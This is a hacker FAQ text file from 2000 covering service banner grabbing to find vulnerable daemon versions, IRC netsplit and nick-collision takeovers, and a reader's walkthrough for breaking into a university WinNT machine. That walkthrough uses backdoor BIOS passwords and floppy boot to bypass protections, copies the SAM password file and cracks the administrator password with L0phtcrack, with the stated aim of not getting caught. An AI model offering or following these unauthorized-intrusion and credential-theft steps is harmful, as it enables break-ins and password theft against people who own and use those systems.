Port 21: FTP (File transfer Protocol) - handles the uploading and downloading of files to and from the server.

Port 25: SMTP (Simple mail transfer protocol) - allows you to send email.

Port 79: FINGER - allows you to 'finger' users.

And so on...every port has a different use, but the most common ports are 21,23,25,34,79,80,110,1080,3128,8080

When you telnet to a port, and the daemon on that port springs into action - it will greet you with a message banner. These banners are a wealth of information - and the key to hacking a server.

In a banner, you will almost always be told the version of the daemon software that is running - and sometimes the version of the operating system. So, once you have the name and version of the daemon running - you can do a search on the internet to see if there are any known vulnerabilties or exploits in that version! For example:

If I connect to ftp.myserver.com on port 21 and get greeted with:

"220 Serv-U FTP-Server v2.5e for WinSock ready.."

I can see that this server is running 'Serv-U' version 2.5e. I can now go to my favourite vulnerability search engine (http://www.packetstorm.securify.com , or http://www.securityfocus.com)
and search for that program. If it finds a good exploit - then we could possibly get access to that system. Also, look at the banner again - see the line 'for Winsock' ? well that pretty much tells us that this system is running windows (as opposed to another Operating system like unix or linux).

This is why port scanning your target system is a good idea (as long as you do it stealthly, and in moderation), because you will be able to see which ports on the system are open for connections. Then you can go in manually with telnet and see what is running on the server.

Response to Hack FAQ's by MisterE

I've read you hacking texts and i think they're nice, though in vol2 i read you used netsplits to gain op in DalNet..only problem here is that DALNet uses ChanServers..so the chanserver will de-op you when join the chan :( The trick does work for EFNet and IRCNet though. For EFNet you don't need a link looker, just join #netsplit, they have those installed for you. This is easier because linklookers are prohibited on most IRC servers.

Now..about the netsplit trick, i know that there are very few servers that are still allow opping when a netsplit has occured..only 5 or so for EFNet.

For the Nick Colliding, i know that it doesn't work for EFNet, most servers check for the timestamp of a nick. The newest nick will be kicked of the server.

That's about the volumes i've read..here's a trick for the next volume(?):

I like downloading stuff at my uni..because they have a very nice connection there (T1). Problem is..that if i d/l-ed like 400 MB mp3, i don't want to put it on 1.44 MB disks..and zip drives also suck. So i bought myself a paradrive. It's a case for a normal Hard Drive that allows me to connect my 3.2GB HD to the parallel port of a computer.

The problem is..i need to install my paradrive. The Target machine is running WinNT. I don't like to have my drivers installed in NT itself..i'd need root access for that. (OK..i do have root access..but getting caught is disastrous here). So i connect my paradrive under DOS.

There are several option to do this:

1) boot from a win95/98 bootfloppy
2) create a NT bootfloppy using ERD Commander (http://www.sysinternals.com)

If booting from the a-drive is disabled, get into the BIOS (using the backdoor passwords mentioned in a previous volume Hack FAQ) and change it to boot from the a-drive

Anyway..if you used option 1 you'll bot from the floppy, but won't have any access to the hard drives, because those use the NTFS filesystem. So you run ntfsdos.exe (also from sysinternals), which allows you to read from NTFS partitions. The registered versio of ntfsdos also allows you to write to ntfs partitions.

OK..now i'm in DOS, can read NTFS partition, so i load my paradrive drivers and copy it to my paradrive. Of course i could also get the passwd file of the winNT compu. If i remember this correctly it is located in some subdirectory of c:\winNT\system32. Look file files named 'sam' or '*.sam'. You cannot access these sam files when WinNT is running because there's a READ/WRITE lock on them. After obtaining the sam file you get L0phtcrack and bruteforce the root password.

Conclusion

Ok, so it took ages and ages to get this out - I can only put it down to writers block :) As I mentioned, I have been very busy on the hacking challenges, and making our very own Wang Products hacking challenge called Mod-X, which isn't up yet - but I will probably send a message to the hack faq mailing list when it is. I am not entirely sure what it is going to involve yet, but hopefully it will be a good way for you to test what I have been talking about. I would be happy to receive more topics written by you if you feel in the hacker textfile writing mood. Also, there is no need to email me asking whether you can link to my site, or put these volumes on your pages - its fine as long as you don't edit them in any way.

If there is anything I haven't covered and you would like me to consider putting into my next text file, please email me at: Wang@most-wanted.com - ALSO! if you have any other methods of solving the questions that I have answered, please send them to me and I will consider putting your solution in as well (with full credit to you obviously).

Wang
http://www.wangproducts.co.uk
http://www.wangproducts.net
22 October 2000